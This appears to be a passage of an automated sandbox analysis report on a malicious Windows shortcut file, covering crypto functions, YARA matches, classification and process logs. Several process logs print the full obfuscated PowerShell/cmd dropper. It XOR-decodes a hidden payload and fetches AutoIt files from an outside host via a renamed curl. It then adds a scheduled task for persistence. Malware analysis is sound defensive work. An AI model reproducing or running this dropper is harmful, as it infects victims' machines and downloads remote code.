Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Detected potential crypto function

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DC1B00	8_2_00007FF7F1DC1B00
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9A9B4	8_2_00007FF7F1D9A9B4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDE930	8_2_00007FF7F1DDE930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA44A4	8_2_00007FF7F1DA44A4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDCB60	8_2_00007FF7F1DDCB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0658	8_2_00007FF7F1DA0658
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DABDE0	8_2_00007FF7F1DABDE0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DBADC8	8_2_00007FF7F1DBADC8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DAB840	8_2_00007FF7F1DAB840
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D91AB0	8_2_00007FF7F1D91AB0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB49D0	8_2_00007FF7F1DB49D0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD2930	8_2_00007FF7F1DD2930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DBE4F0	8_2_00007FF7F1DBE4F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DC2C88	8_2_00007FF7F1DC2C88
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DAF458	8_2_00007FF7F1DAF458
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0C74	8_2_00007FF7F1DA0C74
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCCBDC	8_2_00007FF7F1DCCBDC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA7BAC	8_2_00007FF7F1DA7BAC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA9B60	8_2_00007FF7F1DA9B60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9BB5B	8_2_00007FF7F1D9BB5B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD8350	8_2_00007FF7F1DD8350
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9DEA0	8_2_00007FF7F1D9DEA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE0E40	8_2_00007FF7F1DE0E40
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C55E	8_2_00007FF7F1D9C55E
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C571	8_2_00007FF7F1D9C571
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C538	8_2_00007FF7F1D9C538
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C54B	8_2_00007FF7F1D9C54B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE4D1C	8_2_00007FF7F1DE4D1C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB88D8	8_2_00007FF7F1DB88D8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCD884	8_2_00007FF7F1DCD884
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB7888	8_2_00007FF7F1DB7888
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D94860	8_2_00007FF7F1D94860
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD0804	8_2_00007FF7F1DD0804
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DCF810	8_2_00007FF7F1DCF810
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE473C	8_2_00007FF7F1DE473C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1D9C719	8_2_00007FF7F1D9C719
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DA0F28	8_2_00007FF7F1DA0F28
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4A9B4	12_2_00007FF700E4A9B4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8E930	12_2_00007FF700E8E930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E71B00	12_2_00007FF700E71B00
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8CB60	12_2_00007FF700E8CB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E544A4	12_2_00007FF700E544A4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5BDE0	12_2_00007FF700E5BDE0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E6ADC8	12_2_00007FF700E6ADC8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50658	12_2_00007FF700E50658
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5B840	12_2_00007FF700E5B840
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E649D0	12_2_00007FF700E649D0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E82930	12_2_00007FF700E82930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E41AB0	12_2_00007FF700E41AB0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7CBDC	12_2_00007FF700E7CBDC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E57BAC	12_2_00007FF700E57BAC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4BB5B	12_2_00007FF700E4BB5B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E59B60	12_2_00007FF700E59B60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E88350	12_2_00007FF700E88350
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E6E4F0	12_2_00007FF700E6E4F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E72C88	12_2_00007FF700E72C88
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50C74	12_2_00007FF700E50C74
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E5F458	12_2_00007FF700E5F458
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C571	12_2_00007FF700E4C571
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C55E	12_2_00007FF700E4C55E
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C54B	12_2_00007FF700E4C54B
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C538	12_2_00007FF700E4C538
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E94D1C	12_2_00007FF700E94D1C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4DEA0	12_2_00007FF700E4DEA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E90E40	12_2_00007FF700E90E40
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7F810	12_2_00007FF700E7F810
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E80804	12_2_00007FF700E80804
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9473C	12_2_00007FF700E9473C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E50F28	12_2_00007FF700E50F28
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E4C719	12_2_00007FF700E4C719
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E688D8	12_2_00007FF700E688D8
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E67888	12_2_00007FF700E67888
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E7D884	12_2_00007FF700E7D884
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E44860	12_2_00007FF700E44860

Found potential string decryption / allocating functions

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA1E80 appears 69 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E555C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA50B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E55658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA5658 appears 51 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DB1F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E550B0 appears 40 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E4A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA55C4 appears 41 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DB1FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E54FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E61FA0 appears 286 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E61F00 appears 234 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1D9A780 appears 52 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF7F1DA4FC8 appears 97 times
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: String function: 00007FF700E51E80 appears 69 times

Yara signature match

Source: knfV5IVjEV.lnk, type: SAMPLE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: amsi64_7732.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.rans.evad.winLNK@25/11@1/2

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1D93434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

8_2_00007FF7F1D93434

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\knfV5IVjEV

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: knfV5IVjEV.lnk	ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk	Virustotal: Detection: 29%

Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: GSlLzFnTov.exe	String found in binary or memory: curl: try 'curl --help' for more information

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe 